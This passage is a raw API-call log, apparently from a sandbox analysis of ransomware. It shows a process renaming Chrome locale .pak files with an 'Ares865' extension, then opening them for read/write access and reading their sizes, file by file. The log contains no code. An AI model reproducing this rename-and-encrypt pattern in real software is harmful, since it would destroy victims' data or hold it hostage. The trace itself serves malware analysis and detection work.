dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0143.538] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=320818) returned 1 [0143.557] lstrcpyW (in: lpString1=0x2cce48e, lpString2="ja.pak" | out: lpString1="ja.pak") returned="ja.pak" [0143.557] lstrlenW (lpString="ja.pak") returned 6 [0143.557] lstrlenW (lpString="Ares865") returned 7 [0143.558] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\ja.pak.Ares865") returned 85 [0143.558] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\ja.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\ja.pak"), lpNewFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\ja.pak.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\ja.pak.ares865"), dwFlags=0x1) returned 1 [0143.559] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\ja.pak.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\ja.pak.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0143.559] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=391418) returned 1 [0143.582] lstrcpyW (in: lpString1=0x2cce48e, lpString2="kn.pak" | out: lpString1="kn.pak") returned="kn.pak" [0143.583] lstrlenW (lpString="kn.pak") returned 6 [0143.583] lstrlenW (lpString="Ares865") returned 7 [0143.583] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\kn.pak.Ares865") returned 85 [0143.583] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\kn.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\kn.pak"), lpNewFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\kn.pak.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\kn.pak.ares865"), dwFlags=0x1) returned 1 [0143.585] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\kn.pak.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\kn.pak.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0143.585] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=748523) returned 1 [0143.626] lstrcpyW (in: lpString1=0x2cce48e, lpString2="ko.pak" | out: lpString1="ko.pak") returned="ko.pak" [0143.626] lstrlenW (lpString="ko.pak") returned 6 [0143.626] lstrlenW (lpString="Ares865") returned 7 [0143.626] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\ko.pak.Ares865") returned 85 [0143.626] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\ko.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\ko.pak"), lpNewFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\ko.pak.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\ko.pak.ares865"), dwFlags=0x1) returned 1 [0143.629] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\ko.pak.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\ko.pak.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0143.629] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=330644) returned 1 [0143.648] lstrcpyW (in: lpString1=0x2cce48e, lpString2="lt.pak" | out: lpString1="lt.pak") returned="lt.pak" [0143.648] lstrlenW (lpString="lt.pak") returned 6 [0143.648] lstrlenW (lpString="Ares865") returned 7 [0143.648] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\lt.pak.Ares865") returned 85 [0143.648] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\lt.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\lt.pak"), lpNewFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\lt.pak.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\lt.pak.ares865"), dwFlags=0x1) returned 1 [0143.650] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\lt.pak.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\lt.pak.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0143.650] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=334865) returned 1 [0143.674] lstrcpyW (in: lpString1=0x2cce48e, lpString2="lv.pak" | out: lpString1="lv.pak") returned="lv.pak" [0143.674] lstrlenW (lpString="lv.pak") returned 6 [0143.674] lstrlenW (lpString="Ares865") returned 7 [0143.674] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\lv.pak.Ares865") returned 85 [0143.674] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\lv.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\lv.pak"), lpNewFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\lv.pak.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\lv.pak.ares865"), dwFlags=0x1) returned 1 [0143.676] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\lv.pak.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\lv.pak.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0143.676] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=335824) returned 1 [0143.698] lstrcpyW (in: lpString1=0x2cce48e, lpString2="ml.pak" | out: lpString1="ml.pak") returned="ml.pak" [0143.698] lstrlenW (lpString="ml.pak") returned 6 [0143.698] lstrlenW (lpString="Ares865") returned 7 [0143.699] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\ml.pak.Ares865") returned 85 [0143.699] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\ml.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\ml.pak"), lpNewFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\ml.pak.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\ml.pak.ares865"), dwFlags=0x1) returned 1 [0143.701] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\ml.pak.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\ml.pak.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0143.701] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=838860) returned 1 [0143.748] lstrcpyW (in: lpString1=0x2cce48e, lpString2="mr.pak" | out: lpString1="mr.pak") returned="mr.pak" [0143.748] lstrlenW (lpString="mr.pak") returned 6 [0143.748] lstrlenW (lpString="Ares865") returned 7 [0143.749] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\mr.pak.Ares865") returned 85 [0143.749] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\mr.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\mr.pak"), lpNewFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\mr.pak.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\mr.pak.ares865"), dwFlags=0x1) returned 1 [0143.753] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\mr.pak.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\mr.pak.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0143.754] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=662507) returned 1 [0143.847] lstrcpyW (in: lpString1=0x2cce48e, lpString2="ms.pak" | out: lpString1="ms.pak") returned="ms.pak" [0143.847] lstrlenW (lpString="ms.pak") returned 6 [0143.847] lstrlenW (lpString="Ares865") returned 7 [0143.847] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\ms.pak.Ares865") returned 85 [0143.847] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\ms.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\ms.pak"), lpNewFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\ms.pak.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\ms.pak.ares865"), dwFlags=0x1) returned 1 [0143.850] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\ms.pak.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\ms.pak.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0143.850] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=254701) returned 1 [0143.885] lstrcpyW (in: lpString1=0x2cce48e, lpString2="nb.pak" | out: lpString1="nb.pak") returned="nb.pak" [0143.885] lstrlenW (lpString="nb.pak") returned 6 [0143.885] lstrlenW (lpString="Ares865") returned 7 [0143.885] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\nb.pak.Ares865") returned 85 [0143.885] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\nb.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\nb.pak"), lpNewFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\nb.pak.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\nb.pak.ares865"), dwFlags=0x1) returned 1 [0143.888] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\nb.pak.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\nb.pak.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0143.888] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=296932) returned 1 [0143.932] lstrcpyW (in: lpString1=0x2cce48e, lpString2="nl.pak" | out: lpString1="nl.pak") returned="nl.pak" [0143.932] lstrlenW (lpString="nl.pak") returned 6 [0143.932] lstrlenW (lpString="Ares865") returned 7 [0143.932] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\nl.pak.Ares865") returned 85 [0143.932] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\nl.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\nl.pak"), lpNewFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\nl.pak.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\nl.pak.ares865"), dwFlags=0x1) returned 1 [0143.935] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\nl.pak.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\nl.pak.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0143.935] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=316496) returned 1 [0144.026] lstrcpyW (in: lpString1=0x2cce48e, lpString2="pl.pak" | out: lpString1="pl.pak") returned="pl.pak" [0144.026] lstrlenW (lpString="pl.pak") returned 6 [0144.026] lstrlenW (lpString="Ares865") returned 7 [0144.027] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\pl.pak.Ares865") returned 85 [0144.027] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\pl.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\pl.pak"), lpNewFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\pl.pak.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\pl.pak.ares865"), dwFlags=0x1) returned 1 [0144.030] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\pl.pak.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\pl.pak.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0144.030] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=327912) returned 1 [0144.048] lstrcpyW (in: lpString1=0x2cce48e, lpString2="pt-BR.pak" | out: lpString1="pt-BR.pak") returned="pt-BR.pak" [0144.048] lstrlenW (lpString="pt-BR.pak") returned 9 [0144.048] lstrlenW (lpString="Ares865") returned 7 [0144.048] lstrcmpiW (lpString1="-BR.pak", lpString2="Ares865") returned 1 [0144.049] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\pt-BR.pak.Ares865") returned 88 [0144.049] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\pt-BR.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\pt-br.pak"), lpNewFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\pt-BR.pak.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\pt-br.pak.ares865"), dwFlags=0x1) returned 1 [0144.051] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\pt-BR.pak.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\pt-br.pak.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0144.051] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=321085) returned 1 [0144.069] lstrcpyW (in: lpString1=0x2cce48e, lpString2="pt-PT.pak" | out: lpString1="pt-PT.pak") returned="pt-PT.pak" [0144.069] lstrlenW (lpString="pt-PT.pak") returned 9 [0144.069] lstrlenW (lpString="Ares865") returned 7 [0144.069] lstrcmpiW (lpString1="-PT.pak", lpString2="Ares865") returned 1 [0144.070] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\pt-PT.pak.Ares865") returned 88 [0144.070] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\pt-PT.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\pt-pt.pak"), lpNewFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\pt-PT.pak.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\pt-pt.pak.ares865"), dwFlags=0x1) returned 1 [0144.071] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\pt-PT.pak.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\pt-pt.pak.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0144.072] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=325014) returned 1 [0144.091] lstrcpyW (in: lpString1=0x2cce48e, lpString2="ro.pak" | out: lpString1="ro.pak") returned="ro.pak" [0144.091] lstrlenW (lpString="ro.pak") returned 6 [0144.091] lstrlenW (lpString="Ares865") returned 7 [0144.092] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\ro.pak.Ares865") returned 85 [0144.092] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\ro.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\ro.pak"), lpNewFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\ro.pak.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\ro.pak.ares865"), dwFlags=0x1) returned 1 [0144.094] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\ro.pak.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\ro.pak.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0144.094] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=334595) returned 1 [0144.113] lstrcpyW (in: lpString1=0x2cce48e, lpString2="ru.pak" | out: lpString1="ru.pak") returned="ru.pak" [0144.113] lstrlenW (lpString="ru.pak") returned 6 [0144.113] lstrlenW (lpString="Ares865") returned 7 [0144.114] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\ru.pak.Ares865") returned 85 [0144.114] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\ru.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\ru.pak"), lpNewFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\ru.pak.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\ru.pak.ares865"), dwFlags=0x1) returned 1 [0144.116] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\ru.pak.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\ru.pak.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0144.116] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=517243) returned 1 [0144.142] lstrcpyW (in: lpString1=0x2cce48e, lpString2="sk.pak" | out: lpString1="sk.pak") returned="sk.pak" [0144.142] lstrlenW (lpString="sk.pak") returned 6 [0144.142] lstrlenW (lpString="Ares865") returned 7 [0144.143] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\sk.pak.Ares865") returned 85 [0144.143] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\sk.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\sk.pak"), lpNewFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\sk.pak.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\sk.pak.ares865"), dwFlags=0x1) returned 1 [0144.144] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\sk.pak.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\sk.pak.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0144.145] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=344109) returned 1 [0144.170] lstrcpyW (in: lpString1=0x2cce48e, lpString2="sl.pak" | out: lpString1="sl.pak") returned="sl.pak" [0144.170] lstrlenW (lpString="sl.pak") returned 6 [0144.170] lstrlenW (lpString="Ares865") returned 7 [0144.170] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\sl.pak.Ares865") returned 85 [0144.170] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\sl.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\sl.pak"), lpNewFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\sl.pak.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\sl.pak.ares865"), dwFlags=0x1) returned 1 [0144.172] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\sl.pak.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\sl.pak.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0144.173] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=310142) returned 1 [0144.190] lstrcpyW (in: lpString1=0x2cce48e, lpString2="sr.pak" | out: lpString1="sr.pak") returned="sr.pak" [0144.190] lstrlenW (lpString="sr.pak") returned 6 [0144.190] lstrlenW (lpString="Ares865") returned 7 [0144.191] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\sr.pak.Ares865") returned 85 [0144.191] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\sr.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\sr.pak"), lpNewFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\sr.pak.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\sr.pak.ares865"), dwFlags=0x1) returned 1 [0144.192] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\sr.pak.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\sr.pak.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0144.192] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=499260) returned 1 [0144.258] lstrcpyW (in: lpString1=0x2cce48e, lpString2="sv.pak" | out: lpString1="sv.pak") returned="sv.pak" [0144.258] lstrlenW (lpString="sv.pak") returned 6 [0144.258] lstrlenW (lpString="Ares865") returned 7 [0144.258] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\sv.pak.Ares865") returned 85 [0144.258] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\sv.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\sv.pak"), lpNewFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\sv.pak.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\sv.pak.ares865"), dwFlags=0x1) returned 1 [0144.261] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\sv.pak.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\sv.pak.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0144.261] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=300731) returned 1 [0144.292] lstrcpyW (in: lpString1=0x2cce48e, lpString2="sw.pak" | out: lpString1="sw.pak") returned="sw.pak" [0144.292] lstrlenW (lpString="sw.pak") returned 6 [0144.292] lstrlenW (lpString="Ares865") returned 7 [0144.292] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\sw.pak.Ares865") 